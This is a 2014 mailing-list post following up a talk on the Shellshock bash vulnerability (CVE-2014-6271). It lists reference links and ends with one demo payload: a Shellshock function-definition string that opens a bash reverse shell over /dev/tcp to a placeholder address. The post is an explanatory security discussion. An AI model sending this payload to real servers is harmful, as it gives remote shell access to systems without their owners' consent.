[dundee] shellshock (bash bug)

Gordon Gray gordo.gray at gmail.com
Thu Sep 25 22:15:25 UTC 2014


sources from my talk earlier:

cve
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
better explanation
http://seclists.org/oss-sec/2014/q3/650
easy to use poc
https://pay.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
pretty decent writeup
http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
ping scan
http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html
local bash test
http://security.stackexchange.com/questions/68168/is-there-a-short-command-to-test-if-my-server-is-secure-against-the-shellshock-b

and this is the live demo i would have done if my vps host wasn't being
dos'd. don't run this on anything you don't (already) own
() { :; }; bash -i >& /dev/tcp/X.X.X.X/8080 0>&1

mail me to discuss public demos if you need to scare the shit out of your
boss for a budget increase :)
but seriously, don't break the law. if you do it's not my fault. i'm not
liable. don't sue me. ass covered.